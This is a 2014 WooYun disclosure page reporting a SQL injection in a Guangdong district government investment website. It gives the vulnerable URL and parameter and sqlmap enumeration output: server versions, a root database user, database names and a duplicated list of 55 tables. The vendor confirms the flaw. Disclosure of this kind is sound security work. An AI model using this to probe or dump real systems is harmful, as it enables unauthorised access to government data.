当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066956

漏洞标题:广东省某区旗下网站存在SQL注入漏洞

相关厂商:广东省

漏洞作者: 浮萍

提交时间:2014-07-04 17:24

修复时间:2014-08-18 17:26

公开时间:2014-08-18 17:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-04: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

详细说明:

投资花都网
http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1

Snap2.jpg


Snap3.jpg


Snap4.jpg


丢入sqlmap

web application technology: PHP 5.2.2, Apache 2.2.4
back-end DBMS: MySQL 5.0
banner:    '5.0.41-community-log'
current user:    'root@%'
current database:    'db_investhuadu'


数据库

available databases [5]:
[*] db_investhuadu
[*] db_investhuadu_temp
[*] information_schema
[*] mysql
[*] test


Database: db_investhuadu
[55 tables]
+----------------------------------+
| cms_admintopic                   |
| cms_bmlm                         |
| cms_business                     |
| cms_case                         |
| cms_channel                      |
| cms_download                     |
| cms_ebook                        |
| cms_ebook_copy                   |
| cms_form                         |
| cms_functions                    |
| cms_group                        |
| cms_guanfangtj                   |
| cms_guanfangtj_review            |
| cms_guestbook                    |
| cms_homelogo                     |
| cms_info                         |
| cms_info_backup_zuixingonggao_46 |
| cms_jishuzx                      |
| cms_jishuzx_review               |
| cms_mem_bmfgs                    |
| cms_mem_group                    |
| cms_mem_user                     |
| cms_message                      |
| cms_news                         |
| cms_news_copy                    |
| cms_news_review                  |
| cms_orderfield                   |
| cms_orderform                    |
| cms_orderform2                   |
| cms_orderlist                    |
| cms_ordertext                    |
| cms_pic_list                     |
| cms_pic_type                     |
| cms_product                      |
| cms_qiyejs                       |
| cms_qiyejs_review                |
| cms_question                     |
| cms_session                      |
| cms_setting                      |
| cms_subject                      |
| cms_topic                        |
| cms_tupian                       |
| cms_tupian_review                |
| cms_tupian_tp                    |
| cms_type                         |
| cms_user                         |
| cms_userlog                      |
| cms_video_list                   |
| cms_vote                         |
| cms_website                      |
| cms_xiangmuzx                    |
| cms_xiangmuzx_review             |
| cms_zijinzx                      |
| cms_zijinzx_review               |
| cms_ztdown                       |
+----------------------------------+


漏洞证明:

http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1

Snap2.jpg


Snap3.jpg


Snap4.jpg


丢入sqlmap

web application technology: PHP 5.2.2, Apache 2.2.4
back-end DBMS: MySQL 5.0
banner:    '5.0.41-community-log'
current user:    'root@%'
current database:    'db_investhuadu'


数据库

available databases [5]:
[*] db_investhuadu
[*] db_investhuadu_temp
[*] information_schema
[*] mysql
[*] test


Database: db_investhuadu
[55 tables]
+----------------------------------+
| cms_admintopic                   |
| cms_bmlm                         |
| cms_business                     |
| cms_case                         |
| cms_channel                      |
| cms_download                     |
| cms_ebook                        |
| cms_ebook_copy                   |
| cms_form                         |
| cms_functions                    |
| cms_group                        |
| cms_guanfangtj                   |
| cms_guanfangtj_review            |
| cms_guestbook                    |
| cms_homelogo                     |
| cms_info                         |
| cms_info_backup_zuixingonggao_46 |
| cms_jishuzx                      |
| cms_jishuzx_review               |
| cms_mem_bmfgs                    |
| cms_mem_group                    |
| cms_mem_user                     |
| cms_message                      |
| cms_news                         |
| cms_news_copy                    |
| cms_news_review                  |
| cms_orderfield                   |
| cms_orderform                    |
| cms_orderform2                   |
| cms_orderlist                    |
| cms_ordertext                    |
| cms_pic_list                     |
| cms_pic_type                     |
| cms_product                      |
| cms_qiyejs                       |
| cms_qiyejs_review                |
| cms_question                     |
| cms_session                      |
| cms_setting                      |
| cms_subject                      |
| cms_topic                        |
| cms_tupian                       |
| cms_tupian_review                |
| cms_tupian_tp                    |
| cms_type                         |
| cms_user                         |
| cms_userlog                      |
| cms_video_list                   |
| cms_vote                         |
| cms_website                      |
| cms_xiangmuzx                    |
| cms_xiangmuzx_review             |
| cms_zijinzx                      |
| cms_zijinzx_review               |
| cms_ztdown                       |
+----------------------------------+


修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-04 17:46

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现,典型的SQL注射漏洞,能被进一步利用,危害性大.
影响的数据:中
攻击成本:低
造成影响:中
综合评级为:中,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无